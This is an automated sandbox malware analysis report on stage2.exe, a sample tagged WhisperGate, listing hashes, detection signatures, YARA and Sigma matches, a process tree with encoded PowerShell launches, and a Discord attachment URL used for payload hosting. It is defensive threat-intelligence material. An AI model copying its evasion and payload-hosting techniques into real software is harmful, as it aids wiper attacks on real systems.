
Windows Analysis Report: stage2.exe

Overview

General Information

Sample Name: stage2.exe
Analysis ID: 553986
MD5: 14c8482f302b5e81e3fa1b18a509289d
SHA1: 16525cb2fd86dce842107eb1ba6174b23f188537
SHA256: dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Tags: DEV-0586, exe, WhisperGate

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected MSILDownloaderGeneric
Sigma detected: Suspicious Encoded PowerShell Command Line
Encrypted powershell cmdline option found
Machine Learning detection for sample
.NET source code contains potential unpacker
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Sigma detected: Suspicious Execution of Powershell with Base64
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • stage2.exe (PID: 7084 cmdline: "C:\Users\user\Desktop\stage2.exe" MD5: 14C8482F302B5E81E3FA1B18A509289D)
    • powershell.exe (PID: 7160 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 7140 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WerFault.exe (PID: 492 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 2396 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
stage2.exe | SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth
  • 0x3cf5:$x1: https://cdn.discordapp.com/attachments/
stage2.exe | APT_HKTL_Wiper_WhisperGate_Jan22_2 | Detects unknown wiper malware | Florian Roth
  • 0x3da5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
  • 0x3e77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
  • 0x3cc8:$s1: xownxloxadDxatxxax
  • 0x3de3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • 0x3cf5:$s3: https://cdn.discordapp.com/attachments/
  • 0x8194:$s4: fffxfff.fff
  • 0x115c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
  • 0x1375:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
  • 0x1bec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
  • 0x14db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
stage2.exe | MAL_Unknown_Discord_Characteristics_Jan22_1 | Detects unknown malware with a few indicators also found in Wiper malware | Florian Roth
  • 0x3cc8:$x1: xownxloxadDxatxxax
  • 0x3cf5:$s2: https://cdn.discordapp.com/attachments/

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000000.439887170.0000000000EA2000.00000002.00020000.sdmp | APT_HKTL_Wiper_WhisperGate_Jan22_2 | Detects unknown wiper malware | Florian Roth
  • 0x3ba5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
  • 0x3c77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
  • 0x3ac8:$s1: xownxloxadDxatxxax
  • 0x3be3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • 0x3af5:$s3: https://cdn.discordapp.com/attachments/
  • 0xf5c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
  • 0x1175:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
  • 0x19ec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
  • 0x12db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
00000001.00000002.480052318.0000000000EA2000.00000002.00020000.sdmp | APT_HKTL_Wiper_WhisperGate_Jan22_2 | Detects unknown wiper malware | Florian Roth
  • 0x3ba5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
  • 0x3c77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
  • 0x3ac8:$s1: xownxloxadDxatxxax
  • 0x3be3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • 0x3af5:$s3: https://cdn.discordapp.com/attachments/
  • 0xf5c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
  • 0x1175:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
  • 0x19ec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
  • 0x12db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
00000001.00000000.437666808.0000000000EA2000.00000002.00020000.sdmp | APT_HKTL_Wiper_WhisperGate_Jan22_2 | Detects unknown wiper malware | Florian Roth
  • 0x3ba5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
  • 0x3c77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
  • 0x3ac8:$s1: xownxloxadDxatxxax
  • 0x3be3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • 0x3af5:$s3: https://cdn.discordapp.com/attachments/
  • 0xf5c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
  • 0x1175:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
  • 0x19ec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
  • 0x12db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
00000001.00000000.271766492.0000000000EA2000.00000002.00020000.sdmp | APT_HKTL_Wiper_WhisperGate_Jan22_2 | Detects unknown wiper malware | Florian Roth
  • 0x3ba5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
  • 0x3c77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
  • 0x3ac8:$s1: xownxloxadDxatxxax
  • 0x3be3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • 0x3af5:$s3: https://cdn.discordapp.com/attachments/
  • 0xf5c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
  • 0x1175:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
  • 0x19ec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
  • 0x12db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
Process Memory Space: stage2.exe PID: 7084 | JoeSecurity_MSIL_Downloader_Generic | Yara detected MSIL_Downloader_Generic | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.stage2.exe.ea0000.0.unpack | SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth
    • 0x3cf5:$x1: https://cdn.discordapp.com/attachments/
1.2.stage2.exe.ea0000.0.unpack | APT_HKTL_Wiper_WhisperGate_Jan22_2 | Detects unknown wiper malware | Florian Roth
    • 0x3da5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
    • 0x3e77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
    • 0x3cc8:$s1: xownxloxadDxatxxax
    • 0x3de3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    • 0x3cf5:$s3: https://cdn.discordapp.com/attachments/
    • 0x8194:$s4: fffxfff.fff
    • 0x115c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
    • 0x1375:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
    • 0x1bec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
    • 0x14db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61
1.2.stage2.exe.ea0000.0.unpack | MAL_Unknown_Discord_Characteristics_Jan22_1 | Detects unknown malware with a few indicators also found in Wiper malware | Florian Roth
    • 0x3cc8:$x1: xownxloxadDxatxxax
    • 0x3cf5:$s2: https://cdn.discordapp.com/attachments/
1.0.stage2.exe.ea0000.0.unpack | SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth
    • 0x3cf5:$x1: https://cdn.discordapp.com/attachments/
1.0.stage2.exe.ea0000.0.unpack | APT_HKTL_Wiper_WhisperGate_Jan22_2 | Detects unknown wiper malware | Florian Roth
    • 0x3da5:$sc1: 70 00 6F 00 77 00 65 00 72 00 73 00 68 00 65 00 6C 00 6C 00 00 27 2D 00 65 00 6E 00 63 00 20 00 55 00 77 00 42 00 30 00 41 00 47 00 45 00 41 00 63 00 67 00 42 00 30 00 41 00 43
    • 0x3e77:$sc2: 59 00 6C 00 66 00 77 00 64 00 77 00 67 00 6D 00 70 00 69 00 6C 00 7A 00 79 00 61 00 70 00 68
    • 0x3cc8:$s1: xownxloxadDxatxxax
    • 0x3de3:$s2: 0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
    • 0x3cf5:$s3: https://cdn.discordapp.com/attachments/
    • 0x8194:$s4: fffxfff.fff
    • 0x115c:$op1: 20 6B 85 B9 03 20 14 19 91 52 61 65 20 E1 AE F1
    • 0x1375:$op2: AA AE 74 20 D9 7C 71 04 59 20 71 CC 13 91 61 20 97 3C 2A C0
    • 0x1bec:$op3: 38 9C F3 FF FF 20 F2 96 4D E9 20 5D AE D9 CE 58 20 4F 45 27
    • 0x14db:$op4: D4 67 D4 61 80 1C 00 00 04 38 35 02 00 00 20 27 C0 DB 56 65 20 3D EB 24 DE 61

Sigma Overview

System Summary:

Sigma detected: Suspicious Encoded PowerShell Command Line
Source: Process started; Author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\stage2.exe" , ParentImage: C:\Users\user\Desktop\stage2.exe, ParentProcessId: 7084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, ProcessId: 7160
Sigma detected: Suspicious Execution of Powershell with Base64
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\stage2.exe" , ParentImage: C:\Users\user\Desktop\stage2.exe, ParentProcessId: 7084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, ProcessId: 7160
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\stage2.exe" , ParentImage: C:\Users\user\Desktop\stage2.exe, ParentProcessId: 7084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==, ProcessId: 7160
Sigma detected: T1086 PowerShell Execution
Source: Pipe created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: PipeName: \PSHost.132868886483971359.7160.DefaultAppDomain.powershell

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: stage2.exe; Virustotal: Detection: 44%
Source: stage2.exe; ReversingLabs: Detection: 48%
Machine Learning detection for sample
Source: stage2.exe; Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 13_2_07A341F0 CryptReleaseContext,13_2_07A341F0
Source: stage2.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: unknown; HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49752 version: TLS 1.2
Source: stage2.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\System.pdb& source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001A.00000003.446729518.0000000004D01000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.446463538.0000000000D7F000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.448927179.0000000004D01000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.448308862.0000000004D01000.00000004.00000001.sdmp
    Source: Binary string: ncryptsslp.pdb sd$ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.pdb" source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
    Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: C:\Users\user\Desktop\stage2.PDBx source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: System.Configuration.pdbk source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
    Source: Binary string: winnsi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: rasapi32.pdbJ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: clr.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Users\user\Desktop\stage2.PDBX source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: msasn1.pdbz source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp
    Source: Binary string: C:\Users\user\Desktop\stage2.PDB source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: urlmon.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: schannel.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Core.pdbQ2 source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001A.00000003.447382616.0000000000D85000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: mscorlib.pdb<7 source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000001A.00000003.464587238.0000000005158000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464425484.0000000005157000.00000004.00000001.sdmp
    Source: Binary string: i.pdb source: WerFault.exe, 0000001A.00000003.464587238.0000000005158000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464425484.0000000005157000.00000004.00000001.sdmp
    Source: Binary string: mscoree.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: nsi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: gpapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.ni.pdbRSDS source: WER14DB.tmp.dmp.26.dr
    Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: clrjit.pdb8Std source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: ole32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbf source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: iertutil.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: msasn1.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: nsi.pdb+: source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.pdb source: stage2.exe, 00000001.00000002.481938339.0000000006684000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: combase.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER14DB.tmp.dmp.26.dr
